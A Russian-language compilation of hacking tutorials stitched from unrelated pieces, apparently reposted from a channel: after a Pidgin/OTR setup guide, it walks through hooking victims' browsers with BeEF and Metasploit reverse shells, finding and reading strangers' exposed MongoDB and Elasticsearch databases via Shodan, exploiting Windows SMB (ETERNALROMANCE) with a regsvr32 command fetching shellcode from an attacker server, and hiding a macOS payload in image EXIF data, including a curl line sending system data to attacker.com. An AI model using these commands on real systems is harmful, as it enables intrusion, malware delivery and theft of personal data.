Установка Jabber (XMPP) клиента Pidgin и регистрация нового аккаунта:

1. Качаем клиент (оффлайн инсталлятор)

Ждём 5 секунд и процесс скачивания запускается.

2. Качаем плагин шифрования (OTR)

3. Устанавливаем клиент и плагин.

а) Запускаем pidgin-2.10.6-offline.exe, выбираем язык и нажимаем "Ok".

Нажимаем 3 раза "Далее" и "Установить", после процесса установки нажимаем "Далее" и "Готово".

б) Запускаем pidgin-otr-3.2.1-2.exe

Нажимаем "Next" => "I Agree" => "Install" => "Finish"

4. Запускаем Pidgin. Видим главное окошко программы (ростер) и сообщение приветствия с предложением добавить учетную запись.

Нажимаем "Добавить".

В следующем окне вводим данные вашего нового аккаунта и сервера send.tc ( Данный сервер принадлежит Cosmonavt'у, ведение логов на сервере отключено, TSL AES 256 шифрование ).

Протокол: XMPP

Имя пользователя: Ваш Ник

Домен: send.tc

Пароль: Придумайте Пароль

Поставить галочку "Запомнить пароль"

В самом низу поставить галочку "Создать эту новую учётную запись на сервере"

После того, как заполнили указанные поля, жмём на кнопочку "Добавить".

Далее следует принять сертификат для сервера topsec.in, нажимаем "Принять".

Немного погодя, вылезет запрос на регистрацию новой учётной записи, где поля уже будут заполненны и останется нажать кнопку "Зарегистрировать". После этого вы увидите, что запрос на регистрацию принят и ваша учётная запись была зарегистрирована.

5. Идём в "Уч.записи" => Управление учетными записями => Видим нашу учётную запись => Cтавим галочку в колонке Включено, напротив вашей учетной записи и нажимаем закрыть. Потом включаем. Если вы не видите учётную запись, то загляните в пункт "Включить учётную запись" в меню "Уч.записи" и включите её, кликнув один раз на неё.

Поздравляю, вы зарегистрировали себе учётную запись. Осталось добавить собеседников. Или о том, как добавить JID (Jabber ID. Формируется следующим путём: Ваш_Ник@домен сервера. Например: ETOJID@TOPSEC.IN) товарища себе в контакт лист.

1. В главном окне жмём на меню "Собеседники" -> Добавить собеседника.

В поле имя пользователя собеседника вбиваем его JID (что это такое, разжёвано выше. Например: ETOJID@TOPSEC.IN). В поле "Псевдоним" вбиваем локальный псевдоним собеседника - то прозвище, которое будет показано вам в ростере.

2. После, нажмите на кнопку "Добавить". Собеседнику будет отправлен запрос на авторизацию, он должен будет нажать у себя в ростере кнопку "Авторизировать". В ответ вам придёт точно такой-же запрос, где вы должны сделать то же самое (нажать на кнопку "Авторизировать").

Собственно, всё.

Теперь рассмотрим плагин шифрования OTR и настроим его на правильное функционирование.

1. Основные свойства протокола OTR

Шифрование сообщений - никто иной не сможет прочитать сообщения;

Аутентификация собеседников - уверенность в том, кто является собеседником;

Если потеряны секретные ключи, прошлая переписка не будет скомпрометирована;

Возможность отречения - третье лицо не сможет доказать, что сообщения написаны какому-либо другому адресату.

2. Установка OTR плагина.

Плагин OTR представляет собой .exe-файл. Запускаем его (установка проходит на английском языке).

Окно приветствия. Нажимаем на кнопку "Next".

Лицензионное соглашение. "I Agree".

Выбор установочной папки. Оставляем как есть и нажимаем "Install".

Завершается процедура установки модуля. Снимаем галочку из пункта "Show Readme".

3. Настройка OTR

OTR-защита подразумевает, что у обоих собеседников должны быть

установлены плагины OTR. Каждый пользователь создает ключ, которым

шифруется вся его переписка.

a) Сначала следует включить и настроить модуль OTR.

В меню Pidgin "Средства" –> "Модули" выбираем (из списка)

модуль "Off-the-Record Messaging", ставим галочку и нажимаем "Настроить

модуль".

b) Выбираем нужный аккаунт и создаем ключ. Для этого нужно просто выбрать аккаунт из списка и нажать на кнопку "Создать".

c) Когда Pidgin завершит создание ключа, появится маленькое окошко с информацией об этом. Нажимаем "ОК".

d) Теперь мы видим созданный ключ и его отпечаток (fingerprint). В

этой же вкладке ("OTR" – "Конфигурация") расставим галочки таким образом: "Включить защиту разговоров" – да,

"Автоматически начинать защищенный разговор" – да, "Только защищённый разговор" - да, "Не записывать разговоры OTR в журнал" – да. (Учтите, включив последнюю галочку, логи сохраняться не будут.

Теперь модуль настроен и готов к работе. В окне переписки появилась иконка OTR.

4. Настройка защищенного разговора.

В окне переписки нажимаем на красную иконку "Не защищенно"\"Не идентиф."

В появившемся окне выбираем "идентифицировать контакт".

Существует три способа идентифицировать контакт.

1. Question and answer — Вы должны будите задать секретный вопрос и ввести и правильный ответ на него.

Ваш собеседник должен правильно ответить. После этого он будет идентифицирован, и Ваш разговор будет происходить в защищенном режиме.

2. Shared secret - Вы должны будете использовать секретный ключ,известный только Вам и Вашему собеседнику.

После того как Вы и Ваш собеседник ввели одинаковый ключ, защищенный разговор включен.

3. Manual fingerprint verification- проверка отпечатков. Вы связываетесь с собеседником, сообщаете ему свой отпечаток.

Он сообщает Вам свой. Сверяете отпечатки.Если сходятся,то Вы отмечаете что все совпало.

Как передавать секретный ответ\Секретный ключ\Отпечаток, решать только вам.

Итак, допустим решили использовать третий вариант, выбираем "Manual fingerprint verification", выбираем "Есть" и нажимаем "Authenticate".

Сообщение "The privacy status of the current conversation is now: Защищено" свидетельствует о том что ваш разговор защищен.

На этом всё

Введение.

Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?

Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности...

• Первое что может случится при переходе по ссылке это то, что злоумышленник получит доступ к вашим аккаунтам социальных сетей.
• Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
• Подгрузить малварь используя exploit pack.

На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики!

Подгружаем малварь.

Exploit pack - это своеобразная связка эксплойтов.

К преибольшому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit.

Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.

Metasploit - фреймворк для поиска и эксплуатации уязвимостей. То есть для проведения тестирования на проникновение.

Запуск beef.

В терминале пишем:

beef-xss

Переходим по ссылке: http://127.0.0.1:3000/ui/authentication

Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.

Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js

Нужно подгрузить его ей.

http://<ваш ip>:3000/demos/basic.html

Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.

Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:

1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
2. Ищем там раздел extension. У metasploit меняем значение параметра на true

1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
2. Запускаем metasploit и пишем следующее

msf> load msgrpc

И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.

Переходим в /usr/share/beef-xss/ и пишем

./beef -x

После этого в beef загрузятся exploit'ы.

Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.

И как видно на скриншоте - это windows.

Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp

Заполняем все поля.

Теперь открываем msf и пишем:

  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST <your_ip>
  4. exploit

Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)

А пользователь всего-то перешел по ссылке.

А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:

<script>
  document.location.href="http://<your ip>:3000/demos/basic.html";
</script>

Запускаем xerosploit. И выбираем:

scan --> ip жертвы --> injectjs --> run --> путь до hack.js

Далее проделываем выше описанное. Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны, друзья.

Вывод

Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб-ресурс? Последствия просто ужасны.

Поиск открытых БД с помощью Shodan

Для поиска БД используются специальные поисковики Shodan и Censys. Базы данных имеют определенный паттерн в виде порта и так называемого заголовка. Например, для MongoDB это стандартный порт 27017 и наличие заголовка «mongodb server information». Такие шаблоны существуют и для других БД.

Самый популярный вариант — MongoDB. На момент написания статьи проиндексировано 69100 результатов. Большинство из них закрыты (об этом говорит наличие параметра Authentication partially enabled).

Чтобы найти открытые БД создаем запрос:

all:"mongodb server information" all:"metrics"

В данном случае получаем 24943 результата. Примерно столько существует открытых БД, которые содержат определенную информацию. Конечно, какая-то часть — пустышки, в них нет ничего интересного. Но это уже предмет анализа.

По запросу Elasticsearch результатов меньше. 20283 проиндексированных записей, а лидер — Китай.

port:"9200" all:"elastic indices"

Чтобы полноценно работать с результатами выдачи БД: фильтровать записи по размеру, дате попадания в индекс, количеству коллекций и т.д. нужно использовать более функциональные инструменты. Один из них ― Lampyre.

Если нет желания доставлять себе софт, можно использовать давно знакомый Shodan Command-Line Interface. Для тех, кто хочет работать с помощью командной строки я подготовил файл с командами, которые позволяют находить и анализировать данные в форматах json или xlsx.

Для работы с более экзотическими базами рекомендую использовать LeakLooker. Скрипт написан на Python и работает с Shodan. Помимо стандартных БД поддерживает Kibana, CouchDB.

Поиск открытых БД с помощью Lampyre

Для более гибких настроек можно воспользоваться инструментом Lampyre для ОС Windows. После скачивания приложения необходимо указать почту и подтвердить свой аккаунт. После запуска в режиме Online Mode, нужно нажать New Investidation, выбрать папку для хранения проекта и начать работу.

В List of requests выбираем Shodan search. Вводим API ключ и наш запрос в поле Query, который позволит найти открытые БД.

all:"mongodb server information" all:"metrics"

Также можно указать дополнительные параметры в окне Shodan — 2. Например, страну и порт. Запускаем с помощью кнопки «Execute». Далее появляются результаты. Для графического отображения необходимо выбрать «Schema»->»Network».

Lampyre может фильтровать найденные запросы с помощью встроенного запроса ExploreDB: MongoDB. Выбираем необходимые IP, после этого правой кнопкой вызываем меню и указываем ExploreDB: MongoDB.

После чего получаем все запросы в удобном формате. Можно фильтровать по размеру БД и другим параметрам, которых нет в Shodan. Подтверждением того, что БД открытая, служит параметр text, который имеет статус open. Стоит сортировать результаты по параметрам Size и Count documents, так как самые интересные БД будут содержать максимальное количество записей в таблицах.

Также можно заметить со скриншотов, что Lampyre поддерживает работу с ExploreDB: ElasticSearch. Делаем все по аналогии, используя запрос:

port:"9200" all:"elastic indices"

Получаем в удобном виде базы данных ElasticSearch. Их можно посмотреть, перейдя по ссылке в столбце «http query top 500«.

В итоге находим открытую БД какого-то магазина, где можно найти телефон, дату создание, описание, почту и еще некоторую интересную информацию. Помните, те кто ищет, тот всегда найдет 🙂

Для работы с полученными БД можно использовать любой удобный для вас менеджер. Например, для MongoDB подойдет NoSQL Manager for MongoDB, Robo 3T или Studio 3T for MongoDB. Рассмотрим, на примере один из вариантов.

Анализируем базы данных с помощью Robo 3T for MongoDB

Выбор пал на бесплатную версию Robo 3T. Portable-версия занимает около 15 мб и позволяет быстро подключиться к нужной БД. После запуска видим окно, куда нужно указать IP-адрес. Нажимаем правой кнопкой и добавляем с помощью кнопки Add.

Указываем нужный IP и нажимаем Save.

После удачного подключения можем посмотреть БД. Если подключение произошло, то в левой панели появится новый клиент.

Дальше смотрим коллекции, которые используются в БД:

Можно использовать любой менеджер для работы с БД. Также можно обрабатывать данные и с командной строки. Несмотря на то, что Studio 3T for MongoDB имеет больший функционал (который доступен в течении пробного периода на 30 дней), ты увидел, что можно вполне нормально работать и с бесплатными программами. Все индивидуально.

Заключение

Открытых баз данных действительно много. Почти каждую неделю выходит громкая новость об утечке данных. Это может быть БД отеля, магазина или сервисного центра. При беглом просмотре, среди примеров в статьи было два удачных варианта: магазин и доска объявлений продажи автомобилей. В первом случае, можно было посмотреть заказ, описание и телефон/почту владельца, во втором случае — телефон и марку машины.

Очень часто встречаются конфиденциальные данные в незашифрованном виде. Многие компании хранят информацию и даже не задумываются о возможных последствиях. Я продемонстрировал достаточно способов, чтобы найти открытые БД с терабайтами записей. Что делать с найденной информацией — выбор за тобой.

Дисклеймер- мы не призываем Вас к каким-либо действиям, статья написана исключительно в ознакомительных целях, мы не несем никакой ответственности за Ваши действия!!

ВЗЯТО С КАНАЛА Dark Times

Как обычно, вся информация приводится в ознакомительных целях.

Настройка лабораторной среды

Для настройки лабораторной среды нужно сконфигурировать следующие системы:

Целевая система - Windows Server 2016

Эта машина с установленной 64-битной операционной системой Windows Server 2016 будет использоваться в качестве целевой.

После установки операционной системы дополнительные настройки не требуются. Достаточно знать IP-адрес и убедиться в том, что машина включена на момент атаки.

Система злоумышленника - GNU/Linux

Возможно использование любой другой операционной системы, которая поддерживает работу следующих инструментов:

• Python v2.7 - https://www.python.org/download/releases/2.7/
• Ps1Encode - https://github.com/CroweCybersecurity/ps1encode
• Metasploit Framework - https://github.com/rapid7/metasploit-framework

В итоге у нас есть две настроенные машины, используемые в лабораторной среде:

• Windows Server 2016 x64 – IP-адрес: 10.0.2.13 - Целевая система.
• GNU/Linux Debian x64 – IP-адрес: 10.0.2.6 - Система злоумышленника.

Получение эксплоита

Эксплоит можно скачать по следующей ссылке:

https://www.exploit-db.com/exploits/42315/.

Поскольку скрипт написан на Python, сохраняем файл с расширением .py на машине злоумышленника. Во время запуска возникает следующая ошибка:

Решение проблем с зависимостями

В третьей строке эксплоита импортируется модуль "mysmb", которого нет в Python. Установить этот модуль, разработанный Sleepya, можно установить при помощи утилиты pip, либо скачать по следующей ссылке: https://github.com/worawit/MS17-010/blob/master/mysmb.py.

Файл модуля с именем "mysmb.py" помещаем в папку со скриптом. Для того чтобы эксплоит смог импортировать код модуля, необходимо создать файл с именем «__INIT__.py» с перечнем нужных модулей.

Теперь скрипт сможет найти нужный модуль и не будет выдавать ошибок:

Проверка работоспособности эксплоита

Возможна проверка работоспособности эксплоита без каких-либо модификаций. Если мы запустим скрипт как есть по завершению работы в корневой директории диска C:\ на целевой машине будет создан файл с именем "pwned.txt".

Несмотря на то, что в простейшем случае никакие изменения не требуются, конкретно в вашей ситуации может потребоваться модификация некоторых параметров.

Аутентификация

Уязвимость, используемая в эксплоите ETERNALROMANCE/SYNERGY, требует аутентификации. Эксплуатацию можно осуществить через гостевую учетную запись. Если гостевой аккаунт отключен, нам нужно получить имя пользователя и пароль любой другой учетной записи, которая используется на целевой машине. Важно отметить, что уровень привилегий не имеет значения. Даже если учетная запись с гостевыми правами, после атаки привилегии будут повышены до системного уровня.

Информация об учетной записи задается в файле exploit.py в строках 26-27:

Параметры

Для корректной работы эксплоита необходимо настроить два параметра: IP-адрес целевой машины и имя канала (pipe name). Протокол SMB поддерживает три типа общих ресурсов:

• File: файловые (или дисковые) общие ресурсы, представляющие собой дерево директорий с файлами.
• Print: доступ к ресурсам принтера на сервере.
• Pipe: коммуникация между процессами, использующими модель FIFO, при помощи именованных каналов, которые активны до тех пор, пока система работает, даже если процесс уже не активен.

В отличие от ETERNALBLUE эксплоиты ETERNALROMANCE и ETERNALSYNERGY используют именованные каналы, и, соответственно, нужно выбрать тип канала, который необходим во время атаки.

Лично я пользуюсь «spoolss». Альтернативный вариант: «browser». Кроме того, можно воспользоваться сканером auxiliary/scanner/smb/pipe_auditor в metasploit для поиска доступных каналов на целевой машине.

Запуск без шелл-кода

Теперь запускаем эксплоит при помощи следующей команды:

python exploit.py <target_ip> spoolss 

Как было сказано ранее, если эксплуатация завершилась успешно, в корневой директории диска «C:\» появится новый файл «pwned.txt».

pwned.txt

На данный момент мы уже сделали большой шаг, выполнив успешную эксплуатацию. Теперь нужно модифицировать эксплоит так, чтобы запустить шелл в meterpreter.

Создание шелл-кода

Существует множество способов запустить meterpreter-шелл или выполнить какие-либо другие действия вместо создания текстового файла.

Первый шаг – генерирование шелл-кода, который мы будем использовать в дальнейшем. Лично я очень люблю один метод, у которого масса преимуществ, когда речь заходит про обход различных защит.

Шелл-код будет помещен в файл .SCT, который эксплоит будет загружать и запускать на целевой машине, в результате чего мы получим долгожданную meterpreter-сессию.

Создание файла .SCT при помощи утилиты PS1ENCODE

Ps1encode позволяет сгенерировать и закодировать полезные нагрузки для metasploit в различных форматах на базе PowerShell.

Эту утилиту можно загрузить на github: https://github.com/CroweCybersecurity/ps1encode.

Для генерирования нужной полезной нагрузки нам необходимо запустить Ps1encode со следующими параметрами:

 ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST=<ATTACKER_IP> --LPORT=4444 -t sct

Сгенерированный файл .SCT должен храниться на веб-сервере на машине злоумышленника или в любом другом месте, к которому можно получить доступ из целевой системы. Поэтому при запуске предыдущей команды задается вопрос о том, какой будет полный URL, где мы будем хранить файл .sct. Если будет использоваться машина злоумышленника, нужно ввести следующий URL: http://<ATTACKER_IP>.

Помещение шелл-кода в место, доступное из целевой системы

На предыдущем шаге мы создали файл index.sct в папке утилиты Ps1Encode. Чтобы этот файл был доступен для загрузки эксплоитом на целевой машине мы должны поместить полезную нагрузку в папку веб-сервера и назначить нужные права.

После выполнения команд, показанных на рисунке выше, у нас появляется шелл-код, готовый к употреблению.

Изменение эксплоита

Если мы откроем скрипт в текстовом редакторе и перейдем к строке 463 (и ниже), то увидим следующий код:

На рисунке выше показаны функции, используемые для создания файла «pwned.txt» на целевой машине. Более интересной для нас является закомментированная строка с функцией service_exec().

Функция service_exec() в качестве примера выполняет команду «copy» для создания копии файла «pwned.txt». Эта строка кода не будет выполняться до тех пор, пока вначале стоит символ «#». Если убрать этот символ и запустить эксплоит повторно, мы увидим, что в корне диска «C:\» появилось два файла: pwned.txt и pwned_exec.txt.

Вместо команды copy можно поставить любую другую, которая нам необходима.

Запуск шелл-кода

Теперь мы знаем, в каком месте нужно модифицировать эксплоит для выполнения команды загрузки и запуска шелла в meterpreter:

 regsvr32 /s /n /u /i:http://<attacker_webserver_ip>/shellcode.sct scrobj.dll 

Эксплоит будет выглядеть так:

Получение Meterpreter-сессии

В самом конце, перед запуском эксплоита, мы должны настроить модуль exploit/multi/handler для получения meterpreter-сессии.

Далее запускаем модифицированную версию эксплоита:

Через несколько секунд мы получим meterpreter-сессию на целевой машине с системными привилегиями.

The End.

Сложные сценарии оболочки могут быть имплантированы в метаданные фотографий и позже использованы для эксплуатации MacBook. В дополнение к запутыванию истинной природы атаки, эта техника может быть использована для обхода сетевых брандмауэров, а также бдительных системных администраторов.

В этом сценарии атаки вредоносная команда будет встроена непосредственно в метаданные EXIF файла изображения. Злоумышленник разместит вредоносное изображение на общедоступном веб-сайте, таком как Flickr, что сделает его доступным для загрузки любым пользователем. Затем будет создан накопитель для загрузки изображения, извлечения метаданных и выполнения встроенной команды.

Чтобы было ясно, двойной щелчок по файлу изображения не приведет к выполнению встроенной команды. Это другой тип атаки на macOS, о котором мы говорили в другой статье. Вместо этого команда будет скрыта в метаданных изображения и использована в качестве системы доставки полезной нагрузки.

Stager и Payload - два разных аспекта атаки. Stager предназначен для загрузки изображения и выполнения встроенной полезной нагрузки, в то время как полезная нагрузка является последним битом кода (встроенным в изображение) предназначенным для выполнения одной или нескольких команд.

Зачем вставлять Payload данные в изображения?

Итак, зачем вообще делать ставку, если злоумышленник уже в состоянии выполнить код на целевом MacBook? Ну, в первую очередь, разной степени активного уклонения. Кроме того, возможности размещения могут быть довольно маленькими, всего ~ 100 символов, что ускоряет их выполнение, например, с помощью атаки USB Rubber Ducky или MouseJack.

В большинстве случаев скрытие полезных данных внутри файла изображения не требуется. Однако в средах с высокой степенью безопасности, где каждый домен регистрируется программным обеспечением брандмауэра, может быть полезно скрыть содержимое и источник полезной нагрузки.

Уклонение от брандмауэра

С помощью программного обеспечения, такого как pfSense, регистрируются все домены и IP-адреса, которые посещает каждое устройство в сети. С помощью коммерческого программного обеспечения, такого как брандмауэр FortiGate компании Fortinet, каждый пакет может быть тщательно проанализирован для анализа. Брандмауэры такого типа мешают злоумышленнику, использующему простые TCP-соединения, установленные с Netcat, сохранять на скомпрометированном устройстве или скрытно отображать сеть.

Использование изображений для сокрытия полезных нагрузок может затруднить отслеживание трафика системными администраторами для определения активности как вредоносной или подозрительной.

Уклонение от глубокой проверки пакетов

В защищенных средах операционные системы могут быть сконфигурированы для использования пользовательских сертификатов, которые позволяют сетевым администраторам дешифровать данные, поступающие и получаемые с устройств в сети. С помощью таких инструментов, как Wireshark, можно скомпилировать потоки TCP и воссоздать файлы изображений, используя необработанные захваченные данные.

Антивирус Уклонение

Премиум-версии антивирусного программного обеспечения Avast и AVG могут анализировать и обнаруживать определенные виды накопителей и полезных данных. Например, программное обеспечение AV может идентифицировать большинство рабочих столов, созданных Empire. В защищенных сетевых средах может потребоваться высокая степень запутывания, чтобы избежать обнаружения сигнатур. Использование антивирусных программ может затруднить AV-программам обнаружение истинной природы конкретного файла.

Инструменты для ознакомления

Прежде чем продолжить, вы должны иметь общее представление о таких инструментах, как curl, system_profiler, exiftool, grep и Bash. Все эти темы были описаны в Null Byte ранее в некоторый момент.

Скачать изображение

Для начала загрузите изображение, которое будет использовано при атаке. Stager (показанный на следующем шаге) на самом деле не будет сохранять изображение на компьютер цели, поэтому он не должен быть изображением чего-либо особенно значимого. В демонстрационных целях мы можем использовать изображение профиля в Twitter, которое можно загрузить с помощью wget и сохранить (-O) в каталог /tmp.

~$ wget 'https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg' -O image.jpg

--2019-05-15 06:50:22--  https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg
Resolving pbs.twimg.com (pbs.twimg.com)... 72.21.91.70, 2606:2800:220:1410:489:141e:20bb:12f6
Connecting to pbs.twimg.com (pbs.twimg.com)|72.21.91.70|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19316 (19K) [image/jpeg]
Saving to: ‘image.jpg’

image.jpg                100%[=================================>]  18.86K  64.4KB/s    in 0.3s

2019-05-02 06:50:25 (64.4 KB/s) - ‘image.jpg’ saved [19316/19316]

Создать полезную нагрузку

Для этого примера мы сначала научимся выполнять простую touch команду. Когда модуль stager выполняет полезную нагрузку, встроенную в изображение, он создает на рабочем столе macOS пустой файл с именем «hacked».

Сначала используйте printf, base64 и tr для кодирования полезной нагрузки. Base64 закодирует строку, а tr удалит (-d) переводы строки (\n). Вы всегда должны заключать полезные данные (touch ~/Desktop/hacked)) в одинарные кавычки.

~$ printf 'touch ~/Desktop/hacked' | base64 | tr -d '\n'

dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==

Более сложную полезную нагрузку, которая включает в себя команду macOS system_profiler, можно использовать для выполнения ситуационных атак, а также для скручивания, чтобы отфильтровать вывод команды на сервер злоумышленника.

~$ printf 'd=$(system_profiler SPFirewallDataType);curl -s --data "$d" -X POST http://attacker.com/index.php' | base64 | tr -d '\n'

ZD0kKHN5c3RlbV9wcm9maWxlciBTUEZpcmV3YWxsRGF0YVR5cGUpO2N1cmwgLXMgLS1kYXRhICIkZCIgLVggUE9TVCBodHRwOi8vYXR0YWNrZXIuY29tL2luZGV4LnBocA==

Сделав еще один шаг вперед, можно было бы закодировать весь скрипт Bash, который был сжат в одну строку. В моих тестах, казалось, не было ограничений на количество символов, которые могут быть встроены в тег метаданных.

~$ cat /path/to/any_script.sh | base64 | tr -d '\n'

ZnVuY3Rpb24gZXhlY19oYWNrKCkgeyAvdXNyL2Jpbi90b3VjaCB+L0Rlc2t0b3AvaGFja2VkOyB9O2V4ZWNfaGFjawo=

Вставить Payload в изображение

Чтобы встроить закодированную полезную нагрузку в образ, установите exiftool.

~$ apt-get update && apt-get install exiftool -V

Reading package lists... Done
Building dependency tree
Reading state information... Done
Note, selecting 'libimage-exiftool-perl' instead of 'exiftool'
The following NEW packages will be installed:
   libarchive-zip-perl (1.64-1)
   libimage-exiftool-perl (11.16-1)
   libmime-charset-perl (1.012.2-1)
   libposix-strptime-perl (0.13-1+b5)
   libsombok3 (2.4.0-2)
   libunicode-linebreak-perl (0.0.20190101-1)
0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 3,629 kB of archives.
After this operation, 21.0 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Затем удалите все метаданные EXIF, которые могут быть на изображении.

~$ exiftool -all= image.jpg
  1 image files updated

Затем используйте exiftool для добавления тега метаданных - он будет работать с любым доступным тегом - содержащим закодированную полезную нагрузку. В этой демонстрации используется тег Certificate.

~$ exiftool -Certificate='dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==' image.jpg
  1 image files updated

Когда это будет сделано, убедитесь, что тег Certificate был правильно добавлен с помощью следующей команды exiftool. Обратите внимание на закодированную строку в строке 13.

~$ exiftool image.jpg

01  ExifTool Version Number         : 11.16
02  File Name                       : image.jpg
03  Directory                       : .
04  File Size                       : 21 kB
05  File Modification Date/Time     : 2019:05:02 06:50:57+00:00
06  File Access Date/Time           : 2019:05:02 06:50:57+00:00
07  File Inode Change Date/Time     : 2019:05:02 06:50:57+00:00
08  File Permissions                : rw-r--r--
09  File Type                       : JPEG
10  File Type Extension             : jpg
11  MIME Type                       : image/jpeg
12  XMP Toolkit                     : Image::ExifTool 11.16
13  Certificate                     : dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==
14  Image Width                     : 400
15  Image Height                    : 400
16  Encoding Process                : Progressive DCT, Huffman coding
17  Bits Per Sample                 : 8
18  Color Components                : 3
19  Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
20  Image Size                      : 400x400
21  Megapixels                      : 0.160

Загрузить изображение на сайт

Найти подходящий сайт сложно. Критерии для этого несколько.

Избегайте очистки данных EXIF

Многие популярные веб-сайты, такие как Twitter, Imgur и Instagram, автоматически удаляют метаданные из изображений при загрузке, что делается главным образом для защиты пользователей от случайной загрузки фотографий, содержащих координаты GPS, которые позволят кибер-преследователям и кибербуллинам беспокоить и находить этих пользователей.

Изображения, содержащие полезные данные, будут удалены при загрузке на основные веб-сайты. Веб-сайт-кандидат должен был бы быть проверен вручную, сначала загрузив изображение, затем загрузив его, и используя exiftool, чтобы убедиться, что встроенная полезная нагрузка все еще не повреждена.

Шифрование сайта

Безопасность транспортного уровня имеет важное значение для дальнейшей маскировки этой атаки. Веб-сайт, на котором размещалось изображение, должен использовать HTTPS, что поможет предотвратить сисадмины в анализе запроса GET с хирургической точностью.

Нарушения веб-трафика

В идеале, веб-сайт, использованный в атаке, должен регулярно посещаться сайтом. Например, если цель посещала определенный новостной сайт каждое утро, посещение этого домена не показалось бы подозрительным для системных администраторов, отслеживающих трафик в сети. С другой стороны, необычный GET-запрос на иностранный сайт или сайт для взрослых, вероятно, вызовет некоторые красные флаги. Этот вид информации может быть перечислен на этапе разведки с помощью скрытых захватов пакетов. Главное, чтобы трафик выглядел как можно более привычным для поведения веб-сайта цели.

Генерация Stager

В моих быстрых попытках извлечь метаданные из изображений с помощью встроенных инструментов macOS, ни один из них, казалось, не был способен получить доступ или показать конкретную строку («Сертификат») метаданных EXIF, встроенных в изображение. К счастью, у grep есть опция -a, которая позволяет ему обрабатывать двоичные файлы (например, изображения), как если бы они были в незашифрованном виде, что позволяет ему находить строку «Сертификат» в метаданных.

Ниже приведен пример stager, который можно использовать для загрузки изображений, извлечения и декодирования полезных нагрузок, а затем для выполнения команды.

~$ p=$(curl -s https://website.com/image.jpg | grep Cert -a | sed 's/<[^>]*>//g' | base64 -D);eval $p

Здесь происходит несколько вещей, поэтому я разобью каждую секцию каскадера.

• p=$(...) - большая часть stager заключена в переменную с именем "p" (иначе - полезная нагрузка), предназначенную, прежде всего, для предотвращения сохранения изображения непосредственно на жесткий диск MacOS цели.
• curl -s https://website.com/image.jpg - здесь используется Curl для автоматической загрузки (-s) изображения, содержащего полезную нагрузку, с веб-сайта, выбранного злоумышленником. Изображение немедленно передается (|) в следующую команду grep.
• grep Cert -a - Grep будет принимать необработанные данные изображения, обрабатывать их как открытый текст (-a) при поиске строки «Cert». Этот вывод появится в терминале, как показано ниже.

• sed 's/<[^>]*>//g' - вышеприведенный вывод немедленно передается в эту команду sed. Sed удалит все окружающие данные XML (то есть <xmpRights> </ xmpRights>), оставив только закодированную строку.

• base64 -D - закодированная строка передается в эту команду base64, где она декодируется с опцией -D, что в конечном итоге делает переменную $ p декодированной полезной нагрузкой.

• eval $p - наконец, eval используется для оценки переменной как команды, эффективно выполняя полезную нагрузку в форме переменной.

Мы можем убедиться, что атака была успешно выполнена, найдя «взломанный» файл на рабочем столе macOS.

Опять же, это очень простая полезная нагрузка. Более сложные атаки могут включать автоматический сброс пароля браузера, прослушивание микрофона, перечисление ситуационной осведомленности, повышение привилегий, эксфильтрацию пароля sudo и так далее.

Поговорим сегодня о амбициозном framework

Который был создан theinfecteddrake недавно.

Работа очень объёмная и впечатляющая.

В инструмент заложены 73 различных модуля,ориентированных на пентест.

Также,много уделено внимания по сбору информации,детекту защитных систем ресурсов.

Проще наверное перечислить чего в этом монстре нет.

Модули:

Reconnaissance + OSINT

Passive Reconnaissance:

Ping/Nping Enumeration

WhoIS Lookup

GeoIP Lookup

DNS Config. Lookup

Subdomains Lookup

Reverse DNS Lookup

Reverse IP Lookup

Web Links Gatherer

Google Search (manual search)

Google Dorking (multiple modules) automated

Active Reconnaissance

HPing3 enumeration (automated)

CMS Detection (185+ CMSs supported)

Advanced Traceroute IMPROVED

Grab HTTP Headers

Detect Server IMPROVED

Examine SSL Certificate

robots.txt and sitemap.xml Checker

Subnets Enumeration

Find Shared DNS Hosts

Operaing System Fingerprint

Information Disclosure

Credit Cards Disclosure in Plaintext

Email Harvester

Fatal Errors Enumeration Includes Full Path Disclosure checks

Internal IP Disclosure

Phone Number Havester

Social Security Number Harvester

Scanning & Enumeration

Remote Server WAF Analysis

